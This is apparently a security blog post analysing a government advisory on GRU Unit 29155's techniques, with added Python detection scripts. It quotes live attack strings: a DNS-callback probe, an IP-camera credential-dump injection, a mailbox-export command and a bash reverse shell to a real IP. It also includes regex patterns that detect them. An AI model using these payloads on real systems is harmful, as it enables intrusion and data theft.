On September 5th, 2024, the Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and National Security Agency (NSA) released a joint advisory about the cyber activities of a Russian cyber unit known as GRU Unit 29155 (161st Specialist Training Center) [1]. This group, part of the Russian military, has conducted espionage, sabotage, and reputational harm campaigns against various global targets since 2020. These operations, focused on critical infrastructure, aim to destabilize regions, disrupt services, and steal sensitive information, mainly through destructive malware closely associated with the group, such as WhisperGate.
In this blog post, we will explore the tactics, techniques, and procedures (TTPs) employed by Unit 29155 and how organizations can defend themselves against these sophisticated cyberattacks.
Russian GRU Unit 29155: Cyber Operations
Unit 29155 is a military intelligence group within the Russian General Staff Main Intelligence Directorate (GRU), responsible for carrying out offensive cyber operations globally. Their tactics range from espionage to outright sabotage, and they are notorious for using sophisticated and destructive malware, including WhisperGate, which was notably deployed against Ukrainian organizations in January 2022.
Unit 29155 has broadened its reach beyond Ukraine, targeting NATO members and critical infrastructure sectors in Europe, Latin America, North America, and Central Asia. Their actions aim to disrupt essential services, particularly those that support efforts to aid Ukraine.
Tactics, Techniques, and Procedures (TTPs) Used by Russian Unit 29155
Unit 29155 employs a systematic and highly organized approach to infiltrating and exploiting victim networks. Below is a summary of key TTPs observed in their operations, as mapped to the MITRE ATT&CK framework.
Reconnaissance
Unit 29155 has been observed targeting IP ranges used by multiple governments and critical infrastructure organizations. These actors use various publicly available tools to scan and exploit vulnerabilities.
Below is a list of the tools and methods they utilize, categorized under different reconnaissance tactics:
T1595.001 - Active Scanning: Scanning IP Blocks
Unit 29155 uses open-source tools like Nmap, Acunetix, and MASSCAN to scan IP ranges, identifying open ports, services, and vulnerabilities.
T1595.002 - Active Scanning: Vulnerability Scanning
Tools such as Acunetix, Amass, Droopescan, eScan, and JoomScan are used to identify vulnerable IoT devices and services on the network. MASSCAN and Nmap are also leveraged to discover machines inside victim networks.
For vulnerability discovery, Acunetix was observed gathering details on potential issues like blind cross-site scripting with the following command [1]:
"GET /CMS/files/log.htm HTTP/1.1" * * "(nslookup hitccruvbrumn76c1b.bxss.me||perl -e \"gethostbyname('hitccruvbrumn76c1b.bxss.me')\")"
Explanation of the web request:
The request itself is a standard HTTP GET that attempts to retrieve the file /CMS/files/log.htm from the web server; the actual probe is carried in the quoted field that follows it.
The nslookup hitccruvbrumn76c1b.bxss.me portion attempts a DNS lookup for the domain hitccruvbrumn76c1b[.]bxss[.]me. The nslookup command resolves domain names to IP addresses. By embedding it in the request, the attacker can check whether the server resolves the given domain, which confirms that the injected command was executed. The domain bxss.me is commonly used in blind cross-site scripting (XSS) testing: if the vulnerable server reaches out to this external domain, the tester knows the payload ran on the target.
The perl -e "gethostbyname('hitccruvbrumn76c1b.bxss.me')" portion does the same thing in Perl. The gethostbyname function resolves the IP address of hitccruvbrumn76c1b[.]bxss[.]me, so it is a second way to trigger a DNS query and verify that the target executes the code and contacts the attacker-controlled domain; the || between the two means the Perl variant only runs if nslookup is unavailable or fails. The same out-of-band behaviour is the detection hook for defenders: a web server has no legitimate reason to resolve bxss.me or similar callback domains, so DNS logs from web tiers should be watched for such lookups.
T1590.002 - Gather Victim Network Information: DNS
The actors use tools like Amass and VirusTotal to collect information on victims' DNS, including subdomains, which are later used in targeting efforts.
T1596.005 - Search Open Technical Databases
The group also leverages the Shodan[.]io search engine to identify IP addresses hosting network devices with known vulnerabilities (tracked as CVEs). By searching for these weaknesses, the group can locate publicly accessible devices that provide easy entry points into a network, in effect targeting the "low-hanging fruit" that is easiest to exploit.
Resource Development
T1588.001 - Obtain Capabilities: Malware
Unit 29155 actors, along with their affiliates, frequently use dark web forums to acquire a variety of malicious tools, such as malware and malware loaders. This behavior is common among advanced threat actors, as it allows them to quickly access ready-made tools instead of developing them from scratch.
They have notably been seen utilizing Raspberry Robin malware, in conjunction with the Saint Bot loader, to act as an access broker.
Important Note: In addition to other malware, Unit 29155 is widely associated with the use of WhisperGate in its attacks on Ukraine. However, WhisperGate is not unique to this group and has been employed by other cyber actors as well.
T1583.003 - Acquire Infrastructure: Virtual Private Server
Instead of using their own infrastructure, the group rents Virtual Private Servers (VPSs) to host operational tools, perform reconnaissance, and exfiltrate data from compromised systems. Using VPSs allows the actors to remain anonymous and flexible in their operations.
T1588.005 - Obtain Capabilities: Exploits
Unit 29155 actors also obtain CVE exploit scripts from GitHub repositories and other sources to exploit vulnerabilities in target networks.
The list below contains exploit scripts for specific vulnerabilities that the group possesses. Although the group has access to these publicly available exploits from various repositories, there is no evidence that it has actively exploited them. The CVEs that the group has actively exploited are listed in the Initial Access section below [1].
- CVE-2020-1472 (Microsoft: Windows Server)
- CVE-2021-26084 (Atlassian Confluence Server and Data Center)
- CVE-2021-3156 (Red Hat: Privilege Escalation via Command Line Argument Parsing)
- CVE-2021-4034 (Red Hat: Polkit Privilege Escalation)
- CVE-2022-27666 (Red Hat: Heap Buffer Overflow Flaw)
Initial Access
T1078.001 - Valid Accounts: Default Accounts
A key tactic used by Unit 29155 is leveraging default usernames and passwords on devices like IP cameras. Using exploitation scripts, they authenticate and take control of these devices, particularly those left with factory settings, enabling easy access to systems that haven't been properly secured.
T1190 - Exploit Public-Facing Applications
Unit 29155 has also been known to exploit vulnerabilities in public-facing applications. They’ve used public exploits such as [1]:
- CVE-2021-33044 & CVE-2021-33045 (Dahua Security)
- CVE-2022-26134 & CVE-2022-26138 (Atlassian Confluence Server and Data Center)
- CVE-2022-3236 (Sophos: Firewall)
For instance, they deployed the Through the Wire proof-of-concept exploit for CVE-2022-26134 to attack internet-facing Confluence servers [2], enabling them to execute arbitrary code remotely and gain further control over the compromised systems.
Execution
T1059.001 - Command and Scripting Interpreter: PowerShell
As part of their operational strategy, the group leverages PowerShell to interact with critical system components, escalate privileges, and carry out data exfiltration in a stealthy and efficient manner.
A specific example of their PowerShell use involves exfiltrating email data from compromised mail servers.
The following command is used to export mailbox data [1]:
powershell New-MailboxExportRequest -Mailbox <resource> -FilePath \\{IP Address}\sharefolder\1.pst
This command initiates a New-MailboxExportRequest, an Exchange cmdlet that directs the compromised mail server to export the contents of a specific mailbox to a designated network share (\\{IP Address}\sharefolder\1.pst). This lets Unit 29155 remotely collect entire mailboxes in PST format for later use. Because PowerShell is native to Windows and Exchange environments, these actions blend in with normal administrative activity and attract little attention. Two details help defenders: the cmdlet requires the Mailbox Import Export management role, which is not assigned to any role group by default, so both the role assignment and the cmdlet's invocation are rare events worth alerting on, and an export path pointing at a bare IP address rather than a named file server is unusual for legitimate administration.
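The hunting logic a defender would run over PowerShell script-block or Exchange admin-audit records for the export command above, as an added example that is not part of the original post or the advisory. The event records, host names, user names and the 198.51.100.23 share are constructed sample values; the rule escalates when the export target is a UNC path addressed by a bare IP, as in the quoted command, and also flags removal of export requests, since that hides evidence of collection.

```python
import re
from ipaddress import ip_address

# Constructed PowerShell script-block texts (the kind logged as Event ID 4104 or
# in the Exchange admin audit log); hosts, users and the 198.51.100.23 share are
# sample values, not indicators from the advisory.
EVENTS = [
    {"host": "EXCH01", "user": r"CORP\svc_backup",
     "script": r"New-MailboxExportRequest -Mailbox finance.shared -FilePath \\FS01\ExchBackup\finance.pst"},
    {"host": "EXCH01", "user": r"CORP\jdoe",
     "script": r"New-MailboxExportRequest -Mailbox ceo -FilePath \\198.51.100.23\sharefolder\1.pst"},
    {"host": "EXCH01", "user": r"CORP\jdoe",
     "script": r"Get-MailboxExportRequest | Remove-MailboxExportRequest -Confirm:$false"},
    {"host": "WS07", "user": r"CORP\alice", "script": r"Get-Mailbox -Identity alice"},
]

EXPORT_RX = re.compile(r"New-MailboxExportRequest\b", re.I)
CLEANUP_RX = re.compile(r"Remove-MailboxExportRequest\b", re.I)
FILEPATH_RX = re.compile(r"-FilePath\s+['\"]?(\\\\[^\s'\"]+)", re.I)
MAILBOX_RX = re.compile(r"-Mailbox\s+['\"]?([^\s'\"]+)", re.I)

def assess(event: dict):
    """Return a finding dict for export-related cmdlets, or None for benign scripts."""
    script = event["script"]
    finding = {"host": event["host"], "user": event["user"], "mailbox": None,
               "share_host": None, "severity": "medium", "reasons": []}
    if CLEANUP_RX.search(script):
        # Removing export requests hides evidence of prior collection.
        finding["reasons"].append("Remove-MailboxExportRequest clears export history")
        return finding
    if not EXPORT_RX.search(script):
        return None
    # The cmdlet needs the Mailbox Import Export role, which is not assigned by default.
    finding["reasons"].append("New-MailboxExportRequest invoked")
    mb = MAILBOX_RX.search(script)
    finding["mailbox"] = mb.group(1) if mb else None
    fp = FILEPATH_RX.search(script)
    if fp:
        share_host = fp.group(1)[2:].split("\\")[0]   # host part of the UNC path
        finding["share_host"] = share_host
        try:
            ip_address(share_host)   # bare-IP UNC target, as in the quoted command
            finding["severity"] = "high"
            finding["reasons"].append(f"export written to IP-addressed share {share_host}")
        except ValueError:
            finding["reasons"].append(f"export written to share on {share_host}")
    return finding

def hunt(events: list) -> list:
    """Findings for all events, highest severity first."""
    hits = [f for f in map(assess, events) if f]
    return sorted(hits, key=lambda f: f["severity"] != "high")

if __name__ == "__main__":
    for f in hunt(EVENTS):
        print(f["severity"].upper(), f["user"], "->", f["share_host"], "|", "; ".join(f["reasons"]))
```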
Persistence
T1505.003 - Server Software Component: Web Shell
Unit 29155 has been observed deploying PHP web shells such as P.A.S. The P.A.S. web shell is a commonly used, versatile tool that grants attackers remote access and the ability to execute commands on compromised web servers. By installing this web shell after gaining initial access, Unit 29155 ensures ongoing control over the system, allowing them to run commands, upload and manipulate files, and escalate privileges when necessary.
Credential Access
T1003.001 - OS Credential Dumping: LSASS Memory
Unit 29155 cyber actors target LSASS.exe (Local Security Authority Subsystem Service) to extract valuable authentication data stored in memory. LSASS is responsible for handling credentials and enforcing security policies in Windows systems, making it a key target for attackers.
By dumping the memory of LSASS, the attackers can retrieve sensitive information such as usernames, passwords, and password hashes, which can then be used to move laterally within the network or escalate privileges. Dumping LSASS allows Unit 29155 to gain access to high-value credentials without directly interacting with users, making it a powerful method for further compromising systems.
T1003.002 - OS Credential Dumping: Security Account Manager
Unit 29155 cyber actors have been observed dumping the Security Account Manager (SAM), a key Windows file located at C:\Windows\System32\config\SAM, which stores usernames and hashed passwords. The SAM works alongside the Local Security Authority (LSA) to manage user authentication. Attackers need elevated privileges, such as local administrator rights, to access and dump the SAM file. Once obtained, tools like Mimikatz or Impacket's secretsdump.py are used to extract NTLM or LM password hashes. These credentials can then be cracked offline or reused for lateral movement within the network, making SAM dumping a powerful method for gaining unauthorized access without alerting users.
T1110.003 - Brute Force: Password Spraying
Unit 29155 cyber actors target Microsoft Outlook Web Access (OWA) with password spraying because it's often externally accessible, providing a gateway to internal networks. This technique exploits weak or default passwords across many accounts, allowing attackers to access sensitive emails and potentially escalate privileges within the organization.
T1552.001 - Unsecured Credentials: Credentials in Files
Unit 29155 cyber actors exploit vulnerabilities in IP cameras to extract sensitive configuration settings and plaintext credentials. After compromising the cameras, they perform remote command execution via specially crafted web requests to access stored credentials. These web requests, like:
hxxp://<IP>:<port>/PictureCatch.cgi?username=<NAME>&password=%3becho%20%22%3c%21--%23include%20file=%22SYS_CFG%22--%3e%22%3etmp/Login.htm%3b&data_type=1&attachment=1&channel=1&secret=1&key=PWNED
are designed to dump the camera’s configuration files, which include authentication credentials, in plaintext [1]. By obtaining these credentials, the actors can extend their access to the broader network, enabling further exploitation and lateral movement, while remaining undetected.
Discovery
T1046 - Network Service Discovery
Unit 29155 cyber actors use Nmap with the Nmap Scripting Engine (NSE) for network service discovery after gaining access to internal networks. NSE, written in Lua, allows attackers to create custom scripts to scan for active machines, open ports, and services. This enables them to efficiently map the network, identify vulnerabilities, and plan further attacks.
T1654 - Log Enumeration
The group has also targeted and exfiltrated SECURITY and SYSTEM logs from compromised systems. By enumerating these logs, they can gather detailed information about system activities, including authentication events and security policies, which helps them evade detection.
Lateral Movement
T1550.002 - Use Alternate Authentication Material: Pass the Hash
Unit 29155 used Pass-the-Hash to authenticate using NTLM hashes, allowing them to bypass the need for plaintext passwords when accessing systems via SMB. This method enables lateral movement within the network without requiring password cracking.
Command and Control
T1090.003 - Proxy: Multi-hop Proxy
In a separate action, these actors utilized ProxyChains to anonymize their activities, routing their web requests through multiple proxies. This technique was used to execute commands and interact with compromised systems. They retrieved NT hashes via SMB using smbclient, which provided access to sensitive data on internal network shares. Additionally, they executed commands using Windows Management Instrumentation (WMI) with the obtained hashes and made web requests to resources like i.php and tunnel.jsp. After gaining access to network shares, the actors also interacted with PostgreSQL and MySQL databases to further compromise the target infrastructure.
T1071.001 - Application Layer Protocol: Web Protocols
Unit 29155 also uses POST requests over HTTP to deliver malicious payloads to targeted systems. In the code example provided below, the POST request contains user credentials and a malicious payload embedded in the txtUser field [1].
"txtUser=lol&txtPassword=2&btConnect=Piesl%C4%93gtiesbtConnect=Piesl%C4%93gties&chRemember=on&txtPassword=g00dPa%24%24w0rD&txtUser=$%7b@print(system(%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F179.43.175.38%2F6870%200%3E%261%22))%7d"
The payload leverages bash to open a reverse shell, connecting back to the attacker's machine on port 6870 (179[.]43[.]175[.]38). This reverse shell allows the attacker to remotely execute commands on the victim's machine.
The payload in the txtUser field decodes to a bash command that initiates an interactive shell (bash -i) and redirects input/output over TCP to the attacker's IP, effectively granting them control over the compromised system. This technique of hiding malicious code within POST data allows attackers to bypass basic detection mechanisms while establishing remote access.
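Detection logic that covers the three requests quoted in this post (the Acunetix DNS-callback probe, the IP-camera configuration include, and the PHP reverse shell in the txtUser field), as an added example that is not part of the original post or the advisory. The request samples are constructed copies of those fields, with the ampersand restored between the two btConnect values; the POST path /login.aspx is an assumption, and the IP and port are the ones the post quotes. The classifier percent-decodes each request until stable, matches it against a small rule set, and additionally flags duplicated form fields, since the quoted POST submits txtUser and txtPassword twice and which value an application uses is parser-dependent.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed request fields modelled on the three requests quoted in this post:
# the Acunetix DNS-callback probe, the IP-camera config include and the PHP
# reverse shell in txtUser. The IP and port are the ones the post quotes.
PROBE_FIELD = ("(nslookup hitccruvbrumn76c1b.bxss.me||perl -e "
               "\"gethostbyname('hitccruvbrumn76c1b.bxss.me')\")")
CAMERA_PATH = ("/PictureCatch.cgi?username=<NAME>&password=%3becho%20%22%3c%21--%23include"
               "%20file=%22SYS_CFG%22--%3e%22%3etmp/Login.htm%3b&data_type=1&attachment=1"
               "&channel=1&secret=1&key=PWNED")
SHELL_BODY = ("txtUser=lol&txtPassword=2&btConnect=Piesl%C4%93gties&chRemember=on"
              "&txtPassword=g00dPa%24%24w0rD&txtUser=$%7b@print(system(%22bash%20-i"
              "%20%3E%26%20%2Fdev%2Ftcp%2F179.43.175.38%2F6870%200%3E%261%22))%7d")

# Rules run against the fully percent-decoded request text (path, body, header).
RULES = [
    ("dns_callback_probe", re.compile(r"nslookup\s+\S+|gethostbyname\(|\.bxss\.me\b", re.I)),
    ("ssi_config_include", re.compile(r"<!--#include\s+file=|SYS_CFG", re.I)),
    ("bash_reverse_shell", re.compile(
        r"bash\s+-i\b.*?/dev/tcp/(\d{1,3}(?:\.\d{1,3}){3})/(\d{1,5})", re.I | re.S)),
    ("php_code_injection", re.compile(r"\$\{@?(?:print|system|exec|passthru)\(", re.I)),
]

def decode(text: str) -> str:
    """Percent-decode until stable so double-encoded payloads are normalised too."""
    prev = None
    while prev != text:
        prev, text = text, unquote_plus(text)
    return text

def classify(method: str, target: str, body: str = "", header: str = "") -> dict:
    """Classify one request; header carries a field such as User-Agent or Referer."""
    decoded = " ".join(decode(p) for p in (target, body, header) if p)
    result = {"method": method, "labels": [], "callback": None, "duplicate_fields": []}
    for label, rx in RULES:
        m = rx.search(decoded)
        if m:
            result["labels"].append(label)
            if label == "bash_reverse_shell":  # keep the C2 endpoint for blocking
                result["callback"] = (m.group(1), int(m.group(2)))
    # The quoted POST sends txtUser and txtPassword twice; which value wins is
    # parser-dependent, so duplicate form fields are flagged as parameter pollution.
    params = parse_qs(urlsplit(target).query + "&" + body, keep_blank_values=True)
    result["duplicate_fields"] = sorted(k for k, v in params.items() if len(v) > 1)
    return result

if __name__ == "__main__":
    for rec in [("GET", "/CMS/files/log.htm", "", PROBE_FIELD), ("GET", CAMERA_PATH),
                ("POST", "/login.aspx", SHELL_BODY)]:   # /login.aspx is assumed
        print(rec[0], rec[1][:32], classify(*rec)["labels"])
```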
T1071.004 - Application Layer Protocol: DNS
Attackers utilized DNS tunneling tools like dnscat2 and Iodine to route IPv4 network traffic through DNS queries, enabling covert communication between compromised systems and their command-and-control servers.
T1095 - Non-Application Layer Protocol
Once Unit 29155 successfully runs a payload on a victim system (for instance, a Meterpreter payload), it leverages a reverse TCP session to initiate communication with their command-and-control infrastructure. This reverse TCP connection allows the attackers to maintain remote control over the compromised machine, enabling them to execute further commands. Reverse TCP sessions have been observed operating across various ports, including 1234, 1851, 43221, 443, 4444, 4688, 5432, 8080, 8081, 8082, 8084, 8085, 8088, 8089, 8090, 8443, 8487, and 8888, ensuring flexibility in maintaining access and control over the system.
T1105 - Ingress Tool Transfer
Upon successfully exploiting a target system, Unit 29155 cyber actors initiate a Meterpreter payload, establishing a persistent and encrypted communication channel with their command-and-control (C2) infrastructure. Using the Metasploit Framework, they systematically search for and exploit vulnerabilities in services like MySQL, PostgreSQL, and SSH to extend their reach. To maintain remote access and control, they deploy reverse shells, often leveraging Meterpreter or Netcat, with traffic typically routed over ports such as 8081. This attack flow allows for stealthy lateral movement and execution of further commands while bypassing traditional security controls.
T1572 - Protocol Tunneling
Unit 29155 cyber actors rely on encrypted tunnels to mask their activities, using tools like OpenVPN and GOST. They configure OpenVPN over port 1194 to route traffic, allowing them to perform tasks such as Active Directory enumeration with tools like Adminer, Impacket, and ldapdomaindump without being detected. Additionally, they use the GOST tunneling tool via a SOCKS5 proxy to further anonymize their operations; in observed cases a java process carried the encrypted traffic through compromised networks, keeping lateral movement and exfiltration hidden.
Exfiltration
T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage
Unit 29155 cyber actors employed Rclone, a popular command-line program, to exfiltrate data to cloud storage services like MEGA (mega[.]nz). Rclone is typically used for managing files across cloud storage platforms, but attackers exploit it to transfer stolen data from compromised systems to their controlled cloud storage accounts. By utilizing MEGA, a widely accessible and encrypted file hosting service, the actors ensure that exfiltrated data remains accessible to them while evading detection.
Impact
T1485 - Data Destruction
As stressed before, Unit 29155 actors are also known for their focus on data destruction, often linked to the deployment of the destructive WhisperGate malware. Extensive evidence supports their use of this malware to wipe critical files and render systems inoperable, in line with their objective of causing widespread disruption and damage to targeted infrastructure.
[1] FBI, CISA, and NSA, joint cybersecurity advisory on the cyber operations of GRU Unit 29155, September 5, 2024. [Accessed: September 6, 2024]
[2] "GitHub - jbaines-r7/through_the_wire: CVE-2022-26134 Proof of Concept," GitHub. Available: https://github.com/jbaines-r7/through_the_wire. [Accessed: September 6, 2024]